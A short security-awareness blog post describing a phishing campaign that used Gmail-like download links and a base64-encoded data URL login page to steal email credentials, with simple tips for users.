Keeping up with encoded Phishing Attacks

Cyber-criminals are constantly evolving with the nature and complexity of their attack vectors.

This article explores an old technique — Phishing — and how one may fall victim depending on one’s level of security awareness. Before going into details of this specific attack, please remember a few simple rules:

  1. Be wary of email attachments.
  2. Never supply your email login credentials (username/password/token) as pre-requisite to opening an attachment or to any unknown site.
  3. If, for any reason, you failed to heed to the above and supplied your credentials somewhere already, reset your password immediately!

This specific attack utilized a HTML email message containing the “name-of-the-file-to-download”, “View” and “Download” links similar to that provided by Gmail as shown here:

Gmail-like links in the phishing email

Clicking any of those links leads to this address [http://], which loads a base64 encoded page as the web browser address using the data:text/html;base64,ENCODED_DATA_IS_HERE format. The web browser then translates this page to look like below:

Browser translates the encoded page into this

In reality, it was a simple HTML page with a blurred image used as the page background. Signing in to this page then triggered a submission to a server-side PHP script — at this point the attacker already has the victim’s credentials. This PHP script then utilizes the same “data:text/html;base64,” to re-direct the browser to a missing document.

Following the simple preventive steps above and being generally cyber-security conscious can go a long way to keep us safe online.

Please share your Phishing experiences.